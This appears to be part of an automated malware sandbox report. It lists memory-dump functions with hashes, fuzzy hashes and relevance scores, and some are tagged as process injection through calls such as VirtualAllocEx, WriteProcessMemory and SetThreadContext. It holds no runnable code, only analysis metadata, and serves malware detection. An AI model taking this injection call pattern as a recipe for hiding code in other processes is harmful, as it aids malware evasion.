                                                                      • Instruction ID: bc21f1e8bc3283f52ea24aa64f09b6043e54b075b1b85c56e6bb59cf2dfc80e8
                                                                      • Opcode Fuzzy Hash: 6609e95e3eca934086924836841295b08f52505b082d797b42ea4615ff919d5c
                                                                      • Instruction Fuzzy Hash: B281E2B4E002098FDB48CFE9C884AEEBBB2EF89300F10852AD519BB364D7345946CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 07082D00, Relevance: .5, Instructions: 511COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1e65022f673d04225484f27484ab8a2a1982b649842e81d95b6460e7caed8601
                                                                      • Instruction ID: b27ea363974d57b09640cfe0b3c416a638e70e0fddd64e78e847e1291018d259
                                                                      • Opcode Fuzzy Hash: 1e65022f673d04225484f27484ab8a2a1982b649842e81d95b6460e7caed8601
                                                                      • Instruction Fuzzy Hash: F80216B0B00205CFCBA4EB68C49466EBBE6BFC5604F198A69D456CB365CF35DC41CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0CF1210A, Relevance: .3, Instructions: 269COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ac125834b17c85069c0ba529a29bc71e0c31a92cccaa75823dcdc9a0c0e586b1
                                                                      • Instruction ID: 9a4dec8c81bb0c0d35dfcdfb816fabad371ab40871b48b6c8f7316cd2cb11657
                                                                      • Opcode Fuzzy Hash: ac125834b17c85069c0ba529a29bc71e0c31a92cccaa75823dcdc9a0c0e586b1
                                                                      • Instruction Fuzzy Hash: 37B19B75E19209DFCB08CFE5E5805AEFBB6FB89310F20A42AD806F7254D73499428F16
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0CF10040, Relevance: .2, Instructions: 158COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 667a97b050c47007c75299756deec47fb2e8f12a8c4a94ffb762b817f2ef56cf
                                                                      • Instruction ID: 4de15739ea7e4420b82b95be134bf02e45d2f6cd3827c9b6d7f90feb325fd150
                                                                      • Opcode Fuzzy Hash: 667a97b050c47007c75299756deec47fb2e8f12a8c4a94ffb762b817f2ef56cf
                                                                      • Instruction Fuzzy Hash: 4D616975E4022ACBDB68CF65CD40BEEB7B6FF89300F1082A6D509A7654EB705AC09F41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0CF10006, Relevance: .1, Instructions: 142COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 504847d0af248814a4e253d790f4babb4084fafc5a1841ba15951ed372204fe8
                                                                      • Instruction ID: 4d6436f2a9c5e2e2a4e444e096f1a742af22596b823dd6996cd663a90cb0ad24
                                                                      • Opcode Fuzzy Hash: 504847d0af248814a4e253d790f4babb4084fafc5a1841ba15951ed372204fe8
                                                                      • Instruction Fuzzy Hash: 685174B4E0175A8FDB68CF65CC407D9BBB2AF89300F1482EAC409A7661EB705AC58F40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 07084B70, Relevance: .1, Instructions: 137COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 002a8214e931e4b23de3506f414138dc25a43d4a34808f15c4a0dfccdef92b85
                                                                      • Instruction ID: 5bb06d2e5807a261c85b17481d3dd2a9cbdb8dadd226a9befadc0831569b4222
                                                                      • Opcode Fuzzy Hash: 002a8214e931e4b23de3506f414138dc25a43d4a34808f15c4a0dfccdef92b85
                                                                      • Instruction Fuzzy Hash: E7515EB0D0061A8FDB88CFA9C9406AEFBF2FF89300F14D52AE419B7254D7748A418F54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 07084B80, Relevance: .1, Instructions: 137COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f2b09ef525aa8e97a13e45cbfce4b038dcb79c95776543da8af105e49d0e34da
                                                                      • Instruction ID: 7cb9c388edd7c5aa787020f14167413b45cc1127337d1d37896501a29d1d54db
                                                                      • Opcode Fuzzy Hash: f2b09ef525aa8e97a13e45cbfce4b038dcb79c95776543da8af105e49d0e34da
                                                                      • Instruction Fuzzy Hash: F2516CB0D0421A8FCB88DFAAC5406AEFBF2FF89300F14D52AE419B7254D7748A418F64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0CF122AA, Relevance: .1, Instructions: 130COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9b4811e40c67fe7c1b2ea61891bfce3c5ec1be9c9dbfe30d4ae5eb2b1667fd76
                                                                      • Instruction ID: 2acc76995dc0761c46018262ea431ca12c66d7083e32d912ab41749dede6f82d
                                                                      • Opcode Fuzzy Hash: 9b4811e40c67fe7c1b2ea61891bfce3c5ec1be9c9dbfe30d4ae5eb2b1667fd76
                                                                      • Instruction Fuzzy Hash: 9D514E75E06209DFDB58CFE5E58069EFBB2EB89310F20A42AD40AF7254D7349942CF16
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 07088C18, Relevance: .1, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7ee4672dc15fde99c5bab2690e09e081d8b10551bdcdad2e6120892070f23f82
                                                                      • Instruction ID: 661cdf51f36824a1be579de71e0b75e8d6ecd457459d5322d872a8975a59ed5d
                                                                      • Opcode Fuzzy Hash: 7ee4672dc15fde99c5bab2690e09e081d8b10551bdcdad2e6120892070f23f82
                                                                      • Instruction Fuzzy Hash: 2731DAB1E116188BEB58DFABD84069EFBF7EFC8200F04C5BAC509A6254DB3459858F51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 07085570, Relevance: .1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e7ff53f937deeda8847c7ba9dde83a756fc4306a36a2fd8d19d01e11a99ccce9
                                                                      • Instruction ID: de1be8856786f994bc8d71b9cdc76c7c0806daece6c59d56474331b779173472
                                                                      • Opcode Fuzzy Hash: e7ff53f937deeda8847c7ba9dde83a756fc4306a36a2fd8d19d01e11a99ccce9
                                                                      • Instruction Fuzzy Hash: E421B3B1E006189BEB58CF9BD8443DEBBF7AFC9310F14C16AD408A6258DB751A55CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 07085560, Relevance: .1, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9d3d4cf3181a2e275e40762a9610f9ec1e85e428634e2efe5bdfa30da1ddbb12
                                                                      • Instruction ID: 83e9c3cee58e98b56acdd36e5f2c8f6fc261927764cb6a1c38573a4debdb67f1
                                                                      • Opcode Fuzzy Hash: 9d3d4cf3181a2e275e40762a9610f9ec1e85e428634e2efe5bdfa30da1ddbb12
                                                                      • Instruction Fuzzy Hash: 0821D8B0E006588BEB58CFABD85438EBBF7AFC9300F18C16AD408A6258DB741A45CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0255BE98, Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0255C0EE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 41d7483b37811456e76147a7f10f96c005844fdd72feaa5ced61f98140dbb16d
                                                                      • Instruction ID: 6e9268d169ff6f8731c7c0c091ecb0fbcf082ff6403849bdc69dc261b3b5d84b
                                                                      • Opcode Fuzzy Hash: 41d7483b37811456e76147a7f10f96c005844fdd72feaa5ced61f98140dbb16d
                                                                      • Instruction Fuzzy Hash: 6D814570A00B158FD724DF69C45479ABBF1FF88208F008A2ED84ADBA50D735E949CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0CF116B4, Relevance: 1.6, APIs: 1, Instructions: 145processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 0CF11813
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 6301606f83e6e42c8e09b6be640b313e02844006d90bb6455ec8bbba5f2be262
                                                                      • Instruction ID: 5a6083ac31dfab9f9d8aefe9559ffe937846ba528bd8c943f904773f819fd7a8
                                                                      • Opcode Fuzzy Hash: 6301606f83e6e42c8e09b6be640b313e02844006d90bb6455ec8bbba5f2be262
                                                                      • Instruction Fuzzy Hash: D8510571D01328DFDB64CF99C980BDDBBB6AF48314F1485AAE908B7250DB319A89CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0CF116C0, Relevance: 1.6, APIs: 1, Instructions: 143processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 0CF11813
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: a4471b2f2217c0d89c3e1a4dd70fdf5f0b2d914775d372ca40e1ff0f0ffe401c
                                                                      • Instruction ID: 6a0ac43b5fcab8af79353fb4e2ad9d0b4b1c60ca7edd4809049c76a1f3ede622
                                                                      • Opcode Fuzzy Hash: a4471b2f2217c0d89c3e1a4dd70fdf5f0b2d914775d372ca40e1ff0f0ffe401c
                                                                      • Instruction Fuzzy Hash: B051F671D01318DFDB64CF99C980BDDBBB6AF48314F1485A9E908B7250DB709A89CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0255B3E0, Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0255E06A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: 2cdbf95e3b0f4c6e91b1199098bfc476b01bc769b0f561514c9e2a3b430e74bb
                                                                      • Instruction ID: 202d4963f8c42fec0ab7e73eddce65563fccf0f24a62a096f5cdcc1959e435cd
                                                                      • Opcode Fuzzy Hash: 2cdbf95e3b0f4c6e91b1199098bfc476b01bc769b0f561514c9e2a3b430e74bb
                                                                      • Instruction Fuzzy Hash: AB510FB1C04358DFDB14CFA9C890ADEBFB5BF48314F24856AE819AB210D774A985CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0255B3FC, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0255E06A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: 760f98ea6727af2a5974d72ba6d9e20acf030352d859c63563a2e96b8043c65f
                                                                      • Instruction ID: 13686b8e7b62860aef4485f1af47d80b1319f576e79c8e311828c1e2b5c26717
                                                                      • Opcode Fuzzy Hash: 760f98ea6727af2a5974d72ba6d9e20acf030352d859c63563a2e96b8043c65f
                                                                      • Instruction Fuzzy Hash: 9A51BEB1D00319DFDB14CF9AC894ADEBBB5FF48314F24852AE819AB210D774A985CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0255DF4C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0255E06A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: adf84021175e9954bc36484ae8896957b5e5aaf5241483ef1bf1528ec6c750c3
                                                                      • Instruction ID: afdb2dc53cab250f6ca549414f54ef70a74347f4f5f44757ce66cf2cb7467dde
                                                                      • Opcode Fuzzy Hash: adf84021175e9954bc36484ae8896957b5e5aaf5241483ef1bf1528ec6c750c3
                                                                      • Instruction Fuzzy Hash: E151C0B1D00319DFDB14CF99C884ADEBFB5BF88314F24852AE819AB210D774A985CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0CF11C60, Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0CF11CF5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: 7e2fc8114ca45d26c38962d4c1fe9246324cc74a70ef02c40500320e274318ad
                                                                      • Instruction ID: 6177a225261196278ba4419dacbcceede5a86c6cd0f7ebab4bfcc7b99fe4d727
                                                                      • Opcode Fuzzy Hash: 7e2fc8114ca45d26c38962d4c1fe9246324cc74a70ef02c40500320e274318ad
                                                                      • Instruction Fuzzy Hash: 7D21F4B59002599FDB10CF9AD984BDEBBF4FB48314F54842AE918A3240D774A944CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0CF11C68, Relevance: 1.6, APIs: 1, Instructions: 65injectionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0CF11CF5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: b72d6e1c09bb6064905d3ab2b4de536100935142e03dac12ec1b7fd77487db55
                                                                      • Instruction ID: 5f276e59c646ac30a0439d044f1a72799371c9184896d34c9f3c469712022825
                                                                      • Opcode Fuzzy Hash: b72d6e1c09bb6064905d3ab2b4de536100935142e03dac12ec1b7fd77487db55
                                                                      • Instruction Fuzzy Hash: 6321E3B19006599FCB10CF9AD885BDEBBF4FB48314F54842AE918A7250D774A944CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0CF11AE8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0CF11B6F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: 466522e4df81c72d19f18d2bf2dff3e5f25dbc4dac7a9927ca7f3046b79c2944
                                                                      • Instruction ID: bca760dd727167ea79b2eb9b883b0e7f858f95e747d61fea1abc39eaf6dd6b9f
                                                                      • Opcode Fuzzy Hash: 466522e4df81c72d19f18d2bf2dff3e5f25dbc4dac7a9927ca7f3046b79c2944
                                                                      • Instruction Fuzzy Hash: 6A2104B5901719DFCB10CF9AD984BDEBBF4FB48320F54842AE918A7250D374A544CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02557090, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0255711F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 8ce7cd6d8fd62eac4e353cb8cac7b3d795f54ba6a856419c811417bdafec376a
                                                                      • Instruction ID: ec456fa8ed47e78880daddc47596e9a1931d64ce2dc45143ed88388dd920740f
                                                                      • Opcode Fuzzy Hash: 8ce7cd6d8fd62eac4e353cb8cac7b3d795f54ba6a856419c811417bdafec376a
                                                                      • Instruction Fuzzy Hash: 2221DFB59002199FDB10CFAAD984ADEFBF9FB48324F14845AE814B7250D378A944CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02557098, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0255711F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 7bdf3b36abee6ffff8ca948c4df0d595d0de68958e1580327d58b94e1be72f5b
                                                                      • Instruction ID: 6716242b44f7d6243e37f328d8ef60a670c0b2185816e0fb3d14989465bede1d
                                                                      • Opcode Fuzzy Hash: 7bdf3b36abee6ffff8ca948c4df0d595d0de68958e1580327d58b94e1be72f5b
                                                                      • Instruction Fuzzy Hash: EB21E2B59002189FDB10CFAAD984ADEFBF8FB48324F14841AE914A3310D374A944CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0CF11AF0, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0CF11B6F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: 93555f8310b5e45660ad270637873a46617ba297f399ce6ccd2f423049eb94d6
                                                                      • Instruction ID: 74c58decb42b23cc2bc5d71788a8513e931182637739c4fdf2bdf16b43016e4c
                                                                      • Opcode Fuzzy Hash: 93555f8310b5e45660ad270637873a46617ba297f399ce6ccd2f423049eb94d6
                                                                      • Instruction Fuzzy Hash: 5E21E2B59006599FCB10CF9AD884BDEBBF5FB48320F54842AE918A7250D374A544CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0CF11A2A, Relevance: 1.6, APIs: 1, Instructions: 59threadinjectionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 0CF11AA7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ContextThread
                                                                      • String ID:
                                                                      • API String ID: 1591575202-0
                                                                      • Opcode ID: b4f49911d5e7e1edeff30bc73232840b024a610d401a6310f094c61211f3ff50
                                                                      • Instruction ID: b319cd442d4baea43b3326228bbcf3585c71b732751fac94289349a754f80f17
                                                                      • Opcode Fuzzy Hash: b4f49911d5e7e1edeff30bc73232840b024a610d401a6310f094c61211f3ff50
                                                                      • Instruction Fuzzy Hash: 022127B1D006199FCB04CF9AD984BDEFBF8FB48214F54812AD818B3240D778A9448FA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0CF11A30, Relevance: 1.6, APIs: 1, Instructions: 58threadinjectionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 0CF11AA7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ContextThread
                                                                      • String ID:
                                                                      • API String ID: 1591575202-0
                                                                      • Opcode ID: d7237966485d06ea80846727cc17fcf3c31f679e003592ad604b226042463439
                                                                      • Instruction ID: 0df2c6b89388330d3be4c1ecd25fb838759b4666f80302b4bc3605efd941dadd
                                                                      • Opcode Fuzzy Hash: d7237966485d06ea80846727cc17fcf3c31f679e003592ad604b226042463439
                                                                      • Instruction Fuzzy Hash: 032117B1D006199FCB14CF9AD985BDEFBF8FB48224F54812AD818B3240D778A944CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0255C308, Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0255C169,00000800,00000000,00000000), ref: 0255C37A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: e1026d60d60cfc3e18486c7137a8f4ddd9c989168ba636c3b06156060f1288fd
                                                                      • Instruction ID: 26d95c09a7eda76d61fa869292c91ceff5c708def809550f3a2cafe6bd098f24
                                                                      • Opcode Fuzzy Hash: e1026d60d60cfc3e18486c7137a8f4ddd9c989168ba636c3b06156060f1288fd
                                                                      • Instruction Fuzzy Hash: 231144B2C003189FDB10CF9AC444ADEFBF8AB88328F14842AE819B7200C374A544CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0708BF6A, Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0708BFE3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: d91eaebcb17b33b819436c708bb507a2f18ef08e271e647df6993d4cb7077afa
                                                                      • Instruction ID: 1194268ce2dd6ac0d8d870fa3e7de7a59e41ee88b7529e3abec222dfbfd0b2f5
                                                                      • Opcode Fuzzy Hash: d91eaebcb17b33b819436c708bb507a2f18ef08e271e647df6993d4cb7077afa
                                                                      • Instruction Fuzzy Hash: E52117B59006099FCB10DF9AC984BDEFBF8FB48324F148429E558A7240D778A544CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0255B2C0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0255C169,00000800,00000000,00000000), ref: 0255C37A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 3cacfbe9cb67164e1adb48d066f7ad05cc8bb5d59e932629a75df80f2490dc8d
                                                                      • Instruction ID: 7671152d4b5422bef8021a711edd242cfbba6cd9937301069ddbae126eab5f7b
                                                                      • Opcode Fuzzy Hash: 3cacfbe9cb67164e1adb48d066f7ad05cc8bb5d59e932629a75df80f2490dc8d
                                                                      • Instruction Fuzzy Hash: EE1103B29003189FDB10CF9AD444BDEBBF4EB89314F15886AE819B7200C374A945CFA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0708BF70, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0708BFE3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 92ae7ff973f60c274cac2c83e50e578a5f5aa205320eb79f2aea85253b499006
                                                                      • Instruction ID: d99f7b4c0392d7a56ad6f29306dbc0185aa28a46487c64d48769b339696e109a
                                                                      • Opcode Fuzzy Hash: 92ae7ff973f60c274cac2c83e50e578a5f5aa205320eb79f2aea85253b499006
                                                                      • Instruction Fuzzy Hash: 7F2126B19006099FCB10CF9AC884BDEFBF8FF48320F14842AE858A7240D778A544CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0CF11BBA, Relevance: 1.5, APIs: 1, Instructions: 49memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0CF11C2B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: c335de31877a9d78dbc8801b12eef9d3d0742c97332e6533d056f8f8801bd1bf
                                                                      • Instruction ID: 8e6f7da1e9c7896e1ed049dce7ef18b7a61b8e28f8d064accb49b663134b9a7c
                                                                      • Opcode Fuzzy Hash: c335de31877a9d78dbc8801b12eef9d3d0742c97332e6533d056f8f8801bd1bf
                                                                      • Instruction Fuzzy Hash: 7E11E6B5900649DFCB10CF99D984BDEBFF8FB58324F148419E519A7210C375A554CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0CF11BC0, Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0CF11C2B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: f117b6ff85bf65cdc6566f919e097e1cdb629e95abd8a3befd22b2d09d56a44d
